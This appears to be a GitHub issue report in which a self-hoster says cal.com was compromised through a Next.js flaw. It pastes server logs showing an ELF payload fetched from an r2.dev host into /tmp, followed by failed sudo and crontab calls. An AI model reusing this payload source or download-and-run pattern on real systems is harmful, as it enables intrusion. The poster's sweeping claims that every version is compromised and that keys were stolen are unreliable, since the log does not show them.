self hosted cal.com has been compromised! #25852
Description
Self hosted cal.com has been compromised due to the next.js security. Every version of cal.com has been compromised and all your secret keys have been stolen.
Logs clearly show multiple vulnerabilities and bad actors exploiting and stealing the AWS keys.
Whats even worse is that in the latest fixed version cal.com has locked all critical key features which makes even upgrades impossible.
If the cal.com team had any honor they would either fix the security vulnerability in the older version OR unlock the key features in the fixed version.
logs from the hack on my server::
@calcom/web:start:
@calcom/web:start: --2025-12-10 06:48:52-- https://pub-dc84e32afcfa417fa04d36454032549b.r2.dev/corn
@calcom/web:start: Resolving pub-dc84e32afcfa417fa04d36454032549b.r2.dev (pub-dc84e32afcfa417fa04d36454032549b.r2.dev)... 104.18.50.34, 104.18.54.45, 2606:4700:3113::6812:362d, ...
@calcom/web:start: Connecting to pub-dc84e32afcfa417fa04d36454032549b.r2.dev (pub-dc84e32afcfa417fa04d36454032549b.r2.dev)|104.18.50.34|:443... connected.
@calcom/web:start: HTTP request sent, awaiting response... 200 OK
@calcom/web:start: Length: 24448 (24K) [application/x-elf]
@calcom/web:start: Saving to: '/tmp/corn'
@calcom/web:start:
@calcom/web:start: 0K .......... .......... ... 100% 2.19M=0.01s
@calcom/web:start:
@calcom/web:start: 2025-12-10 06:48:53 (2.19 MB/s) - '/tmp/corn' saved [24448/24448]
@calcom/web:start:
@calcom/web:start: sh: 57: sudo: not found
@calcom/web:start: sh: 62: crontab: not found
@calcom/web:start: ⨯ [TypeError: Invalid character in header content ["x-action-redirect"]] {
@calcom/web:start: code: 'ERR_INVALID_CHAR'
@calcom/web:start: }
@calcom/web:start: ⨯ [Error: x] { digest: 'cm9vdAo=' }
@calcom/web:start: 07:41:10:193 [WARN] orgDomains.ts Org support not enabled for hostname without "." {